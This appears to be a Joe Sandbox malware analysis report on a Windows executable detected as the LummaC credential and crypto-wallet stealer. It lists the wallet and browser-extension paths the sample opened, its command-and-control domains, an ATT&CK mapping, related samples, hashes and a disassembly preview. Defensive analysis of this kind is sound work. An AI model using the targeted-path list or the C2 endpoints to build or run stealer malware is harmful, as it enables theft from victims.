Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IERiUft8Wi.exe PID: 788, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: IERiUft8Wi.exe PID: 788, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	31 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IERiUft8Wi.exe	55%	Virustotal		Browse
IERiUft8Wi.exe	58%	ReversingLabs	Win32.Trojan.Symmi
IERiUft8Wi.exe	100%	Avira	TR/Crypt.XPACK.Gen
IERiUft8Wi.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://mindhandru.buzz/al	100%	Avira URL Cloud	malware
https://mindhandru.buzz/apieed	100%	Avira URL Cloud	malware
https://mindhandru.buzz/_AP	100%	Avira URL Cloud	malware
https://mindhandru.buzz/te	100%	Avira URL Cloud	malware
https://mindhandru.buzz/apiz	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mindhandru.buzz	104.21.11.101	true	false		high

Contacted URLs

Name	Malicious	Reputation
scentniej.buzz	false	high
rebuildeso.buzz	false	high
appliacnesot.buzz	false	high
screwamusresz.buzz	false	high
cashfuzysao.buzz	false	high
inherineau.buzz	false	high
prisonyfork.buzz	false	high
hummskitnj.buzz	false	high
mindhandru.buzz	false	high
https://mindhandru.buzz/api	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/al	IERiUft8Wi.exe, 00000000.00000003.1467459469.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467576272.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mindhandru.buzz/apieed	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369748162.0000000005680000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369595792.0000000005679000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369684966.0000000005679000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1370677126.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369846666.0000000005675000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1391638992.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1369884000.000000000567B000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/	IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1391638992.000000000567C000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1392244134.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419601356.000000000567C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/pi	IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz:443/api	IERiUft8Wi.exe, 00000000.00000003.1467644015.000000000567C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/te	IERiUft8Wi.exe, 00000000.00000003.1450284221.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/_AP	IERiUft8Wi.exe, 00000000.00000003.1467459469.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467576272.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499548166.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498226570.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498488611.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mindhandru.buzz/apiz	IERiUft8Wi.exe, 00000000.00000002.1499489441.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micro	IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498335415.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1343921102.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450584216.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	IERiUft8Wi.exe, 00000000.00000003.1392073257.00000000056AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	IERiUft8Wi.exe, 00000000.00000003.1393099605.0000000005795000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	IERiUft8Wi.exe, 00000000.00000003.1344718429.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344586888.00000000056BF000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1344642573.00000000056BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	IERiUft8Wi.exe, 00000000.00000003.1416611502.000000000567A000.00000004.00000800.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1416553577.0000000005671000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.11.101	mindhandru.buzz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581219
Start date and time:	2024-12-27 08:45:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IERiUft8Wi.exe renamed because original name is a hash value
Original Sample Name:	c317f66c3bb595d92533e3d0fe227366.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target IERiUft8Wi.exe, PID 788 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:46:28	API Interceptor	8x Sleep call for process: IERiUft8Wi.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.11.101	zi042476Iv.exe	Get hash	malicious	LummaC	Browse
	C8FtVPhuxd.exe	Get hash	malicious	LummaC	Browse
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse
	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse
	ZX2M0AXZ56.exe	Get hash	malicious	LummaC	Browse
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mindhandru.buzz	oTZfvSwHTq.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	zi042476Iv.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	C8FtVPhuxd.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	U7TAniYFeK.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	P0SJULJxI0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	b0ho5YYSdo.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	r06aMlvVyM.exe	Get hash	malicious	LummaC	Browse	172.67.165.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	oTZfvSwHTq.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.165.185
	zi042476Iv.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	C8FtVPhuxd.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	U7TAniYFeK.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	6wFwugeLNG.exe	Get hash	malicious	LummaC	Browse	172.67.135.139
	9mauyKC3JW.exe	Get hash	malicious	Unknown	Browse	172.67.153.243
	uUtgy7BbF1.exe	Get hash	malicious	LummaC	Browse	104.21.71.155
	x4PaiRVIyM.exe	Get hash	malicious	LummaC	Browse	172.67.175.134
	3vLKNycnrz.exe	Get hash	malicious	LummaC	Browse	104.21.62.151

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	oTZfvSwHTq.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	zi042476Iv.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	C8FtVPhuxd.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	U7TAniYFeK.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	8lOT1rXZp5.exe	Get hash	malicious	RedLine	Browse	104.21.11.101
	6wFwugeLNG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	9mauyKC3JW.exe	Get hash	malicious	Unknown	Browse	104.21.11.101
	uUtgy7BbF1.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	x4PaiRVIyM.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	3vLKNycnrz.exe	Get hash	malicious	LummaC	Browse	104.21.11.101

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.951387471271285
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IERiUft8Wi.exe
File size:	1'884'672 bytes
MD5:	c317f66c3bb595d92533e3d0fe227366
SHA1:	ff7cf48fd32a6e4b73b14568c7610d585e5b40d3
SHA256:	77e2dd1562a40f41cea1d27cd0bf045c762372807813718327a6cae72c46731e
SHA512:	6415beacba6698451e4610799f99dacc4522f81e9dd60e65d076bc0910656cdc4e30115ff5242743f7d7bbbae851a0cc884a2da9e5cdea486011f748e7b9704a
SSDEEP:	49152:6PK+ZDavbc8mfhKVdteGkKnEzKgJTeQH:6PK+6bcVfhKSKnEzKgJTxH
TLSH:	A2953311BCA0DA38C95DA1721E839F94FBB4886D0582DB119D4B73FF09336D7AD20D6A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................J...........@...........................J......O....@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ab000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0E3912185Ah
push fs
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F0E39123855h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
